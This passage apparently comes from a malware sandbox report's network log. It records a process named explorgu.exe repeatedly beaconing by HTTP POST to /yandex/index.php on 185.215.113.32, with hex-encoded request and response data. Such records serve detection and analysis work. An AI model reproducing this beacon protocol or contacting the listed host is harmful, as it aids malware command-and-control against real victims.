                                                                                            Mar 28, 2024 20:03:48.509469986 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:48.510250092 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:48.761765957 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            54192.168.2.449791185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:49.123192072 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:49.369859934 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:49.370623112 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:49.638946056 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            55192.168.2.449792185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:50.000562906 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:50.247215986 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:50.248018980 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:50.499737978 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            56192.168.2.449793185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:50.856306076 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:51.103030920 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:51.105777979 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:51.357445002 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            57192.168.2.449794185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:51.707994938 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:51.946882010 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:51.947747946 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:52.190576077 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            58192.168.2.449795185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:52.544728994 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:52.791361094 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:52.792236090 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:53.041850090 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            59192.168.2.449796185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:53.406583071 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:53.651858091 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:53.652770042 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:53.904185057 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            60192.168.2.449797185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:54.263551950 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:54.510035992 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:54.510780096 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:54.762201071 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            61192.168.2.449798185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:55.122673035 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:55.687480927 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:55.934226990 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:55.935235023 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:56.186988115 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            62192.168.2.449799185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:56.546983957 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:56.793590069 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:56.817039967 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:57.069752932 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            63192.168.2.449800185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:57.434578896 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:57.679805994 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:57.680610895 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:57.932151079 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            64192.168.2.449801185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:58.294320107 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
